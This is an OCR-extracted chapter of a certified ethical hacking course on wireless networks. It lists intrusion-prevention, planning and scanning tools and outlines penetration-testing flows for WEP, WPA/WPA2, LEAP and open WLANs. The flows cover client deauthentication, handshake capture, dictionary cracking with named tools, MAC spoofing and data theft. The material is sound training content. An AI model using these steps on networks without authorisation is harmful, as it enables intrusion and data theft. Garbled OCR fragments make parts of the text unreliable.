AirDefense provides a single Ul-based platform for wireless monitoring, intrusion protection, automated threat mitigation, etc. It provides tools for wireless rogue detection, policy enforcement, intrusion prevention, and regulatory compliance. It uses distributed sensors that work in tandem with a hardened purpose-built server appliance to monitor all 802.11 (a/b/g/n) wireless traffic in real time. It analyzes existing and day-zero threats in real time against historical data to accurately detect all wireless attacks and anomalous behavior. It enables the rewinding and reviewing of detailed wireless activity records that assist in forensic investigations and ensure policy compliance.

Module 15 Page 2367




N&twori<

Alarm?

Conflguraton

WiredSw

Ik* P0IM Wirele** Client J

WfflM S

CH Quick Stajrity Viow I K.O.0 Ch«nntl ftm ldJ — *<*«• Wlf‫«־‬l«M Ar‫״ ״‬

Sensors

1,?on

w«re*es$ Cte^ts

1,624

BSS*

Wired Switches W1rele55 SwitC. ..

FIGURE 15.79: AirDefense Screenshot

Module 15 Page 2368




Wi-Fi Security Auditing Tool: Adaptive W ireless IPS

f Fu

Copyright © by IG-COHCil. All Rights Reserved. Reproduction is Strictly Prohibited.

(«•»)

W i-F i S e c u r it y A u d i ti n g T o o l: A d a p ti v e W i r e l e s s IP S Source: http://www.cisco.com

Adaptive Wireless IPS (WIPS) provides specific network threat detection and mitigation against malicious attacks, security vulnerabilities, and sources of performance disruption. It provides the ability to detect, analyze, and identify wireless threats. It also delivers proactive threat prevention capabilities for a hardened wireless network core that is impenetrable by most wireless attacks, allowing customers to maintain constant awareness of their RF environment.

Module 15 Page 2369



•I I I I I I I I

I


Wireless Control System

AlarmSiiiiiiiihv ^

CISCO Monitor ‫״‬

U<#r: r rn t tg! virtual D om ain‫׳‬ Roports ‫׳י־‬

8y«t«m

©

L J Generd Properttes

f i t ' »

Configure ▼ Sen

Advanced Parameters: sanity-mse *eri/OM ' Mctaltv •aar/c#♦ > ayst♦n > fetsm ai General Information

NM5P Prt dm-ters

Product Nome

Cisco Mobility Scrvics Cnone

Product Idenbfier (PID)

AIR-MSE-3010-K9

Version

6 0*2 A

Version Idortfiod (VJD)

V01

| ‫ ן‬Advanced Parameters

Started At

2/l61'09 1 49 PM

Serial Number (SN)

Not Specified

gJLcgs

Current Server Time

2/17,9:54 09‫ ׳‬AM

Timezonc

Am sricc/Lc5_An gs! c s

Hardware Restarts

10

Active Sessions

1

y j Atr up se«1nn< 1rap L‫׳‬est raters

► (fcjAtcam ► i n Status

Advanced Parameters Advanced Debuo

► 1£j paanrenance Context Aware Service v»lPS Service

®

NIP. Service

O

Logging Level

Trocc

Cor© Engine

fcd Bviblc

Database

0

Gcnerol

₪ Enable

MSEAocation Servers

Ed Encbls

Object Manager

bd Era b19

SMMP Mediation

LJ Enable

XML Mediation

Ed & ‫«־‬b k

Erable

Asynchronous

Q Enable

NMSP Protocol

Q ervabl#

□

Humber of Dcj> to keep Events

2

session Timeout

30

Absent Data cleanup interval

1440

J 1 • 99999 | 1 99999 rains J 1 99399 ‫ ־‬rnins

y

Kotiftflt Hjrdsiare

a

Cl* jr C9nit 0‫וי‬ration

|

FIGURE 15.80: Adaptive Wireless IPS Screenshot

Module 15 Page 2370




Wi-Fi Security Auditing Tool: Aruba RFProtect WIPS

f FH

Integrated wireless intrusion detection and prevention

YOU ARE NO W ■

Automatic threat mitigation for centrally evaluating forensic

IN A W IF I A R E A

data, and actively containing rogues and locking down device configuration Automated compliance reporting to meet policy mandates for PCI, HIPAA, D0D 8100.2, and GLBA with automated report distribution that is tailored to specific audit

I The M o b ile E d g e Company

requirements

1

http ://www. arubanetworks.com Copyright © by EG-GtUCil. All Rights Reserved. Reproduction is Strictly Prohibited.

W i-F i S e c u r it y A u d i t i n g T o o l: A r u b a R F P r o t e c t W IP S Source: http://www.arubanetworks.com Aruba's RFprotect system represents the breed overlay wireless intrusion detection and prevention (WIDP) system. RFprotect Distributed is a wireless security solution that incorporates the Wireless Threat Protection Framework, including -defined threat signatures for complete threat detection, attack prevention, "no wireless" policy enforcement, and compliance reporting inside the enterprise. It is capable of doing automatic threat mitigation for centrally evaluating forensic data, actively containing rogues, and locking down device configuration and automated compliance reporting to meet policy mandates for PCI, HIPAA, D0D 8100.2, and GBLA with automated report distribution that is tailored to specific audit requirements.

Module 15 Page 2371




_

Wi-Fi Intrusion Prevention System Enterasys® Intrusion Prevention System

£ H

CEH

Network Box IDP http://www.network-box.co.uk

http://www.enterasys. com

‫ ־‬E

RFProtect Wireless Intrusion Protection

AirMobile Server http://www.airm obile.5e

http://www.arubanetworks.com

SonicWALL Wireless Networking

WLS Manager http://www.airpatrolcorp. com

http://o-www.sonicwall, com

(§ 1 * 1

HP TippingPoint IPS

A

http://hl 7007. wwwl.hp.com

J

Wireless Policy Manager (W P M ) http://www.airpatrolcorp.com

*

AirTight W IPS http://www.airtightnetworks.com

z.

,m im i

ZENworks® Endpoint Security Management http://www.no veil, com


0 ‫ן‬

W i-F i I n t r u s i o n P r e v e n t i o n S y s te m

Wi-Fi intrusion prevention systems block wireless threats by automatically scanning, detecting, and classifying all unauthorized wireless access and rogue traffic to the network, thereby preventing neighboring s or skilled hackers from gaining unauthorized access to the Wi-Fi networking resources. A few Wi-Fi intrusion prevention systems are as follows: 9

Enterasys® Intrusion Prevention System available at http://www.enterasvs.com

9

RFProtect Wireless Intrusion Protection available at http://www.arubanetworks.com

9

SonicWALL Wireless Networking available at http://o-www.sonicwall.com

9

HP TippingPoint IPS available at http://hl7007.wwwl.hp.com

9

AirTight WIPS available at http://www.airtightnetworks.com

9

Network Box IDP available at http://www.network-box.co.uk

9

AirMobile Server available at http://www.airmobile.se

9

WLS Manager available at http://www.airpatrolcorp.com

9

Wireless Policy Manager (W PM ) available at http://www.airpatrolcorp.com

9

ZENworks® Endpoint Security Management available at http://www.novell.com

Module 15 Page 2372




Wi-Fi Predictive Planning Tools AirMagnet Planner http://www.flukenetworks.com

h&

n

Cisco Prime Infrastructure http://www.cisco.com

CEH

Connect EZ Predictive RF CAD Design http://www.connect802.com

Ekahau Site Survey (ESS) http://www.ekahau. com

<^K

AirTight Planner

ZonePlanner

http://www.airtightnetworks.com i

LANPIanner _

" ’

i ‫־‬n

http://www.m otorola, com

RingMaster http://www.juniper.net

[ jj

http://www.ruckuswireless.com

Wi-Fi Planning Tool http://www.aerohive.com

TamoGraph Site Survey http://www.tamos, com


;;

‫ ן‬W i-F i P r e d i c t i v e P l a n n i n g T o o ls

Wi-Fi predictive planning tool successfully plan, deploy, monitor, troubleshoot, and report on indoor and outdoor wireless networks from a centralized location. A few Wi-Fi predictive planning tools are as follows: 9

AirMagnet Planner available at http://www.flukenetworks.com

9

Cisco Prime Infrastructure available at http://www.cisco.com

9

AirTight Planner available at http://www.airtightnetworks.com

9

LANPIanner available at http://www.motorola.com

Q

RingMaster available at http://www.juniper.net

Q

Connect EZ Predictive RF CAD Design available at http://www.connect802.com

9

Ekahau Site Survey (ESS) available at http://www.ekahau.com

Q ZonePlanner available at http://www.ruckuswireless.com 9

Wi-Fi Planning Tool available at http://www.aerohive.com

9

TamoGraph Site Survey available at http://www.tamos.com

Module 15 Page 2373




Wi-Fi Vulnerability Scanning Tools tor ‫•׳ ״‬

Zenmap

Cj

Nexpose Community Edition

http://nmap.org

http://www.rapid7.com

____

Nessus http://www. tenable.com

d

M

CEH

^

WiFish Finder ^

http://www.airtightnetworks.com

Penetrator Vulnerability

OSWA

^I

http://securitystartshere.org

Scanning Appliance http://www.seoint.com

TgH

WiFiZoo

SILICA

http://community.corest.com

http://www.im m unityinc.com

Ijr3 |

Network Security Toolkit ___ J ‫ ___ ן‬J

http://networksecuritytoolkit.org

Wireless Network Vulnerability Assessment http://www.secnap.com


W i-F i V u l n e r a b i l i t y S c a n n i n g T o o ls Wi-Fi vulnerability scanning tools are vulnerability scanners that determine the weaknesses in the wireless networks and secure them before attackers actually attack and compromise. The following are a few Wi-Fi vulnerability scanning tools: e

Zenmap available at http://nmap.org

9

Nessus available at http://www.tenable.com

9

OSWA available at http://securitystartshere.org

9

WiFiZoo available at http://community.corest.com

Q

Network Security Toolkit available at http://networksecuritvtoolkit.org

Q

Nexpose Community Edition available at http://www.rapid7.com

9

WiFish Finder available at http://www.airtightnetworks.com

Q

Penetrator Vulnerability Scanning Appliance available at http://www.seoint.com

Q SILICA available at http://www.immunityinc.com 9

Wireless Network Vulnerability Assessment available at http://www.secnap.com

Module 15 Page 2374




Module Flow

CEH


M o d u l e F lo w As mentioned previously, wireless networks are more vulnerable to attacks compared to wired networks. Wireless networks provide comfort and allow s to access the network from anywhere within the region. This is making wireless networks more popular today. Wireless networks are insecure if configured improperly and not maintained. Hence, in order to secure wireless networks, you should conduct pen testing on the WLAN to determine the security loopholes and then fix them. This whole section is devoted to Wi-Fi penetration testing, which describes the steps carried out by the pen tester to conduct penetration testing on a target WI-FI network.

Wireless Concepts

^

1
Wireless Threats


Module 15 Page 2375

Wireless Encryption


^

Bluetooth Hacking



Module 15 Page 2376





W ire le s s P e n e tr a tio n T e s tin g A penetration test is the process of actively evaluating information security measures in a wireless network. There are a number of ways that this can be undertaken. The information security measures are actively analyzed for design weaknesses, technical flaws, and vulnerabilities. The results are delivered comprehensively in a report to executive, management, and technical audiences. The wireless penetration testing can be done for the following purposes: 9

Security Control Auditing: To test and validate the efficiency of wireless security protections and controls

9

Data Theft Detection: Find streams of sensitive data by sniffing the traffic

9

Information System Management: Collect information on security protocols, network strength, and connected devices, typically using network discovery, service identification modules, port scanners, and the OS

Q

Risk Prevention and Response: Provide s comprehensive approach of preparation steps that can be taken to prevent exploitation

Q

Upgrading Infrastructure: Change or upgrade existing infrastructure of software, hardware, or network design

9

Threat Assessment: Identify the wireless threats facing an organization's information assets

Module 15 Page 2377




W ireless Penetration Testing Framework

r V (•itilwd

EH

tt*H4i ttMhM

Wireless Pen Testing Framework m Discover wireless devices wt If wireless device is found, document all the findings a

If the wireless device found is using Wi-Fi network, then perform general Wi-Fi network attack and check if it uses WEP encryption

«

If WLAN uses WEP encryption, then perform WEP encryption pen testing or else check if it uses WPA/WPA2 encryption

M

If WLAN uses WPA/WPA2 encryption, then perform WPA/WPA2 encryption pen testing or else check if it uses LEAP encryption

■

If WLAN uses LEAP encryption, then perform LEAP encryption pen testing or else check if WLAN is unencrypted

■

If WLAN is unencrypted, then perform unencrypted WLAN pen testing or else perform general Wi-Fi network attack


I

W ire le s s P e n e tr a tio n T e s tin g F ra m e w o rk

Generally, penetration testing is conducted through a series of steps to find out the vulnerabilities in the wireless network. The following are those penetrations steps that you, as a penetration tester, must follow to conduct a penetration test on a target wireless network. Step 1: Discover wireless devices The first step in the wireless penetration testing framework is discovering wireless devices in the vicinity. Several Wi-Fi network discovery tools are available online that give more information about the wireless networks in the vicinity. Examples of tools that can be used for finding Wi-Fi networks are: inSSIDer, NetSurveyor, Netstumbler, Vistumbler, and Wavestumbler. Step 2: Check whether a wireless device is found If YES, document all the findings such as the wireless devices in the region. If NO, try again to discover the wireless devices. Step 3: See if there is a Wi-Fi network If YES, perform a general Wi-Fi network attack and check for the encryption mechanism used by the Wi-Fi network. If NO, again start discovering wireless devices in the vicinity. Module 15 Page 2378




Step 4: Check whether the Wi-Fi network uses W EP encryption If YES, perform W EP penetration testing to break the encryption. If NO, check for other encryption mechanisms. WEP encryption, Wired Equivalent Privacy (WEP), is a security protocol specified in the IEEE Wireless Fidelity (Wi-Fi) standard 802.11b that is designed to provide a wireless local area network (WLAN) with a level of security and privacy comparable to what is usually expected of a wired LAN. W EP is a component of the IEEE 802.11 WLAN standards. Its primary purpose is to provide for confidentiality of data on wireless networks at a level equivalent to that of wired LANs. Physical security can be applied in wired LANs to stop unauthorized access to a network. Step 5: Check whether the Wi-Fi network uses WPA/WPA2 encryption If YES, then perform WPA/WPA2 penetration testing. If NO, check for other possibilities of encryption mechanisms. WPA encryption is less exploitable when compared with WEP encryption. But WPA is also a little cracker friendly. WPA/WAP2 can be cracked by capturing the right type of packets. Cracking can be done offline. Offline cracking only involves being near the AP for few moments. Step 6: Check whether the Wi-Fi network uses LEAP Encryption? If YES, then perform LEAP penetration testing. If NO, check whether the wireless LAN network is encrypted or not. LEAP is a Lightweight Extensible Authentication Protocol. It is a proprietary WLAN authentication protocol developed by Cisco. Step 7: Determine if it is an unencrypted WLAN If YES, then perform unencrypted WLAN penetration testing. If NO, perform a general Wi-Fi network attack.

Module 15 Page 2379




Wi-Fi Pen Testing I General penetration steps for all Wireless networks: 1.

Create a rogue access point

2.

Deauthenticate the client using the tools such as Karma, Hotspotter, Airsnarf, etc., and then check for client deauthentication If client is deauthenticated, then associate with the client, sniff the traffic and check if phrase/certificate is acquired, or else try to deauthenticate the client again If phrase is acquired, then crack the phrase using the tool wzcook to steal confidential information or else try to deauthenticate the client again


W i-F i P e n T e s t i n g F r a m e w o r k To conduct a penetration test by simulating the actions of an attacker, follow these steps: Step 1: Perform a general Wi-Fi network attack Wi-Fi pen testing framework begins with the general Wi-Fi network attack. Step 2: Create a rogue access point In order to create a backdoor into a trusted network, an unauthorized or unsecured access point is installed inside a firewall. Any software or hardware access point can be used to perform this kind of attack. Unauthorized access points can allow anyone with an 802.11equipped device onto the corporate network, which puts a potential attacker close to the mission-critical resources. With the help of wireless sniffing tools, the following can be determined: access points for the authorized Medium Access Control (MAC) address, vendor name, or security configurations. The attacker can then create a list of MAC addresses of authorized access points on the LAN, and cross check this list with the list of MAC addresses found by sniffing. An access point should be considered a rogue if it looks suspicious. It can possibly be located by using a simple known technique that involves walking with a wireless access point-sniffing device in the direction where the signal strength of the access point's beacon increases.

Module 15 Page 2380




Finally, determine which part of the network needs to be examined. Sometimes a rogue access point may be an active access point that is not connected to the corporate network, but these access points are not security issues. When an access point is found that interfaces with the corporate network, it must be shut off immediately. Using a centralized network-monitoring device attached to the wired network, workstations and individual s that use multiple systems can be tracked easily. It is important to walk through a company's facilities so that rogue access points are detected and eliminated. Centralized network-monitoring devices are spyware that are used to monitor networks. Step 3: Is the client deauthenticated? If YES, associate with client. If NO, deauthenticate the client using a Wi-Fi vulnerability scanning tools such as Karma, Hotspotter, Airsnarf, etc. Step 4: Associate the client After deauthentication, the attacker or the pen tester should associate with the client in order to perform an attack on the Wi-Fi network. Several techniques are available to associate with the client. Step 5: Sniff the traffic After being associated with the client, the attacker or the pen tester should sniff the network traffic in order to analyze the traffic and search for the weak clients. In this step, the attacker should capture the IVs generated by making use of tools such as airodump-ng or Cain & Abel with a bssid filter to collect unique IVs. With the help of wireless sniffing tools, the authorized Medium Access Control (MAC) The attacker can then create a list of MAC and cross check this list with the list of MAC

following can be determined: access points for the address, vendor name, or security configurations. addresses of authorized access points on the LAN, addresses found by sniffing.

Step 6: Determine if there ia an acquired phrase/certificate? After sniffing the traffic, check whether any phrase/certificate of the Wi-Fi network is acquired. If YES, then try to crack the phrase/certificate. If NO, search for the deauth client.

Module 15 Page 2381




Step 7: Crack the phrase The pphrase is an element that is used for ensuring the security of the wireless network's data transmission. However, these this phrase can consist of some flaws that attackers use to their advantage to launch attacks on the WLANs. phrases can be cracked using tools such as wzcoock. Step 8: Steal confidential information After cracking the phrases, the attackers or the pen testers have full access to the network, as a legitimate . After attaining the access credentials of a legitimate client, the attacker can steal the confidential or sensitive information of the clients or network.

Module 15 Page 2382




Pen Testing LEAP Encrypted WLAN START v

■ Deauthenticate the client using tools such as Karma, Hotspotter, Airsnarf, etc. ■

If client is deauthenticated, then break the LEAP encryption using tools such as asleap, THCLEAP Cracker, etc., to steal confidential information or else try to deauthenticate the client again

Break LEAP

Steal Confidential Information

Use tools such as asleap, THC-LEAP Cracker, etc.

J %^

Copyright © by IG -C O H C il. All Rights Reserved. Reproduction is Strictly Prohibited.

P e n T e s t i n g a L E A P - E n c r y p te d W L A N Penetration testing of the LEAP-encrypted WLAN involves the following steps: Step 1: Locate the LEAP-encrypted WLAN Pen testing a LEAP-encrypted WLAN begins with locating the LEAP-encrypted WALN. Step 2: Check for the deauth client If the client is deauthenticated, then break the LEAP encryption. LEAP stands for Lightweight Extensible Authentication Protocol. It is a proprietary wireless LAN authentication method developed by Cisco. It allows clients to reauthenticate frequently and generates a new W EP key for every successful authentication. Step 3: Break LEAP Though LEAP is more secure than other encryption mechanisms, it can also be broken using tools such as asleap, THC-LEAP Cracker, etc. In order break into the WLAN that is protected with LEAP encryption, the attacker first needs to break LEAP. Step 4: Steal confidential information Successfully breaking LEAP gives full network access to the attacker. Therefore, the attacker can steal confidential information of the client or network.

Module 15 Page 2383




P e n T e s t i n g W P A /W P A 2 E n c r y p t e d W LAN

v

Oeauth Client?

Sniff the Traffic

*

Use tools such as Karma, Hotspotter,

m

f VJ

Airsnarf, etc.

Captured

‫>־‬

EAPOL

....... >

®

Deauthenticate the client using tools such as Karma, Hotspotter, Airsnarf, etc.

o

If client is deauthenticated, sniff the traffic and then check the status of capturing EAPOL handshake or else try to deauthenticate the client again

6

If EAPOL handshake is captured, then perform PSK dictionary attack using tools such as coWPAtty, Aircrack-ng, etc. to steal confidential information or else try to deauthenticate the client again Copyright © by IG-C0HCil. All Rights Reserved. Reproduction is Strictly Prohibited.

A

P e n T e s t i n g a W P A /W P A 2 - E n c r y p te d W L A N

Penetration testing of a WPA/WPA2-encrypted wireless network consists of the following steps: Step 1: Determine if the network is WPA/WPA2 encrypted First check whether the wireless network is WPA/WPA2 encrypted or not. If the WLAN is WPA/WPA2 encrypted, then deauthenticate the client using tools such as Karma, Hotspotter, Airsnarf, etc. Step 2: Determine if the client is deauthenticated Check whether the client is deauthenticated or not. If YES, sniff the traffic. If NO, check the encryption mechanism and try to deauthenticate the client using the tools. Step 3: Sniff the traffic The pen tester should sniff the network traffic in order to analyze the traffic and search for weak clients. In this step, the attacker should capture the IVs generated by making use of tools such as airodump-ng or Cain & Abel with a bssid filter to collect unique IVs. With the help of wireless sniffing tools, the following can be determined: access points for the authorized Medium Access Control (MAC) address, vendor name, or security configurations.

Module 15 Page 2384




The attacker can then create a list of MAC addresses of authorized access points on the LAN, and cross check this list with the list of MAC addresses found by sniffing. Step 4: Determine if the EAPOL handshake is captured After sniffing the traffic, check whether the EAPOL handshake is captured or not. If YES, perform a WPA/WPA2 dictionary attack. If NO, check whether the client is deauthenticated or not. Step 5: Perform a WPA/WPA2 dictionary attack After capturing the EAPOL handshake, perform a WPA/WPA2 dictionary attack by creating a list of possible phrases, compute the hashes of those guesses, and check them against the captured EAPOL. This technique is referred to as a dictionary attack. WPA/WPA2 dictionary attacks can be performed using the tools such as coWPAtty, Aircrak-ng, etc. Step 6: Steal confidential information The final step in the process of pen testing a WPA/WPA2-encrypted WLAN is stealing the confidential information.

Module 15 Page 2385




Pen Testing WEP Encrypted WLAN

c EH

(•itilwd

tt*H4i IlMhM

J

Check if the SSID is visible or hidden

J

If SSID is visible, sniff the traffic a nd then check the status of packet capturing

J

If the packets are captured/injected, then break the WEP key using tools such as Aircrack-ng, Airsnort, WEPcrack, etc., or else sniff the traffic again.

J

If SSID is hidden, then deauthenticate the client using tools such as Aireplay-ng, Commview, etc., associate the client and then follow the procedure of visible SSID


P e n T e s t i n g a W E P - E n c r y p te d W L A N Penetration testing of a WEP-encrypted WLAN consists of the following steps: Step 1: Determine of the WLAN is W EP encrypted First check whether the wireless network is WEP encrypted or not. If the WLAN is WEP encrypted, then apply the WPA/WPA2 penetration testing on the wireless network. Step 2: Check for a visible SSID Check whether the SSID of the WLAN is visible or not. The SSID must be visible in order for the Wi-Fi to work properly. If YES, sniff the network traffic. If NO, deauthenticate the client using the tools such as Aireplay-ng, Commview, V o id ll, etc. After d‫־‬authentication try to associate with the client in order to sniff the network traffic. Step 3: Sniff the traffic After getting associated with the client, the attacker or the pen tester should sniff the network traffic in order to analyze the traffic and search for the weak clients. In this step the attacker should capture the IVs generated by making use of tools such as airodump-ng or Cain & Abel with a bssid filter to collect unique IVs. With the help of wireless sniffing tools, the following can be determined: access points for the authorized Medium Access Control (MAC) address, vendor name, or security configurations. Module 15 Page 2386




The attacker can then create a list of MAC addresses of authorized access points on the LAN, and cross check this list with the list of MAC addresses found by sniffing. Step 4: Determine if the packets are captured or injected After sniffing the network traffic, check the status of the packet capturing. Check whether the packets are captured/injected. If the status of the captured/injected packets is YES, then break the W EP or otherwise, sniff the network traffic again. NetworkMiner is a Network Forensic Analysis Tool (NFAT) for Windows. It can be used as a ive network sniffer/packet capturing tool in order to detect operating systems, sessions, hostnames, open ports, etc. without putting any traffic on the network. Step 5: Break W EP After injecting the packets, break the W EP key using tools such as Aircrack-ng, Airsnort, WEPcrack, etc., WEP is the encryption mechanism that is implemented for providing security for the data transmission of the Wi-Fi network. It has some programming flaws in it that are vulnerable to attacks. These W EP keys can be broken easily. Step 6: Launch replay attacks After attaining the WEP encryption key, the attacker can easily launch replay attacks on wireless networks. 1. Check if the SSID is visible or hidden. 2.

If the SSID is visible, sniff the traffic, and then check the status of packet capturing.

3.

If the packets are captured/injected, then break the WEP key using tools such as Aircrack-ng, Airsnort, WEPcrack, etc., or otherwise sniff the traffic again.

4.

If the SSID is hidden, then deauthenticate the client using tools such as Aireplay-ng, Commview, V o id ll, etc.; associate the client and then follow the procedure of a visible SSID.

Module 15 Page 2387




Pen Testing Unencrypted WLAN Scan the Wi‫־‬Fi Network

‫ ׳‬START

■

C EH

(•itilwd

tt*H4i IlMbM

Check if the SSID is visible or hidden

If SSID is visible, sniff for IP range and then check the status of MAC filtering

Deauth Client

If MAC filtering is enabled, spoof valid MAC using tools such as SMAC or connect to the AP using IP within the discovered range

If SSID is hidden, discover the SSID using tools such as Aireplay-ng, and follow the procedure of visible SSID

Connect to the AP using IP within the discovered range

Copyright © by IG-COHCil. All Rights Reserved. Reproduction is Strictly Prohibited.

P e n T e s tin g U n e n c ry p te d W LAN

&

The following steps illustrate the process of penetration testing of an unencrypted wireless network: Step 1: Scan the Wi-Fi network Penetration testing of a WLAN begins with the scanning of the Wi-Fi network. Scan for the networks to map out the wireless networks in the area. Step 2: Determine if the WLAN is unencryted Check whether it is unencrypted WLAN or encrypted WLAN. If the WLAN is unencrypted, then proceed with the process of pen testing. Step 3: Determine if the SSID is visible Check whether the SSID of the WLAN is visible or not. The SSID must be visible in order for the Wi-Fi to work properly. If YES, sniff for the IP range. If NO, deauthenticate the client using the tools such as Aireplay-ng, Commview, V o id ll, etc. Sfter deauthentication, try to associate with the client using the tools such as Airplay-ng or CommView in order to sniff the IP range. Step 4: Sniff for IP range

Module 15 Page 2388




Use the IP sniffing tools to sniff and discover the IP range of the network. The attacker can launch an attack on the wireless network with a known valid IP range. Step 5: Determine if MAC filtering isenabled After retrieving the IP range using the IP sniffing tools, check for MAC filtering. Check whether MAC filtering is enabled or disabled. If MAC filtering is enabled, then spoof for the valid MAC address. MAC addresses are the requisite credentials for accessing the network. Therefore, if the attacker wants to get connected with the target network, then he or she should have a valid MAC address. If MAC address filtering is disabled, then the attacker can connect to the AP using IP within the discovered range. Step 6: Spoof a valid MAC A valid MAC address can be obtained by spoofing it. MAC addresses can be spoofed using tools such as MAC ID changer (TMAC, SMAC).

Module 15 Page 2389




CEH

M o d u le S u m m a ry

□

IEEE 802.11 standards based Wi-Fi networks are widely used for communication and data transfer across a radio network

□

A Wi-Fi infrastructure generally consists of hardware components such as wireless routers and APs, antennas, relay towers and authentication servers, and software components such as encryption algorithms, key management and distribution mechanisms

□

Most widely used wireless encryption mechanisms include WEP, WPA and WPA2, of which, WPA2 is considered most secure

□

W EP uses 24-bit initialization vector (IV) to form stream cipher RC4 for confidentiality, and the CRC-32 checksum for integrity of wireless transmission

□

WPA uses TKIP which utilizes the RC4 stream cipher encryption with 128-bit keys and 64-bit keys for authentication whereas WPA2 encrypts the network traffic using a 256 bit key with AES encryption

□

W EP is vulnerable to various analytical attack that recovers the key due to its weak IVs whereas WPA is vulnerable to brute forcing attacks

□

Wi-Fi networks are vulnerable to various access control, integrity, confidentiality, availability and authentication attacks

□

Wi-Fi attack countermeasures include configuration best practices, SSID settings best practices, authentication best practices and wireless IDS systems


M o d u le S u m m a ry

‫®י‬

9 IEEE 802.11 standards based communication and data transfer across a radio network.

Wi-Fi

networks

are

widely

used

for

A Wi-Fi infrastructure generally consists of hardware components such as wireless routers and APs, antennas, relay towers and authentication servers, and software components such as encryption algorithms, key management, and distribution mechanisms. Most widely used wireless encryption mechanisms include WEP, WPA, and WPA2, of which, WPA2 is considered most secure. WEP uses a 24-bit initialization vector (IV) to form a stream cipher RC4 for confidentiality and the CRC-32 checksum for integrity of wireless transmission. 0

WPA uses TKIP,which utilizes the RC4 stream cipher encryption with 128-bit keys and 64-bit keys for authentication, whereas WPA2 encrypts the network traffic using a 256 bit key with AES encryption. W EP is vulnerable to various analytical attacks that recover the key due to its weak IVs, whereas WPA is vulnerable to brute forcing attacks.

Module 15 Page 2390




9

Wi-Fi networks are vulnerable to various access control, integrity, confidentiality, availability, and authentication attacks. Wi-Fi attack countermeasures include configuration best practices, SSID settings best

Module 15 Page 2391


Cehv8 Module 15 Hacking Wireless Networks.pdf 5b3i3t

Overview 5o1f4z

More details 6z3438

Related Documents c2h70

Cehv8 Module 15 Hacking Wireless Networks.pdf 5b3i3t

Cehv8 Module 13 Hacking Web Applications .pdf 462g4x

Cehv8 Module 16 Hacking Mobile Platforms 68121h

Cehv8 Module 05 System Hacking .pdf oo6f

Cehv8 Module 16 Hacking Mobile Platforms.pdf 33572j

Cehv6.1 Module 20 Hacking Wireless Networks.pdf 2h1q3f

More Documents from "Mehrdad" 30193z

Cehv8 Module 15 Hacking Wireless Networks.pdf 5b3i3t

Cehv8 Module 11 Session Hijacking.pdf 58yf

Ceh V8 Labs Module 12 Hacking Webservers.pdf z1p6o

Ceh V8 Labs Module 03 Scanning Networks.pdf 2w6l16

Ceh V8 Labs Module 02 Footprinting And Reconnaissance.pdf 6xj37

Cehv8 Module 13 Hacking Web Applications .pdf 462g4x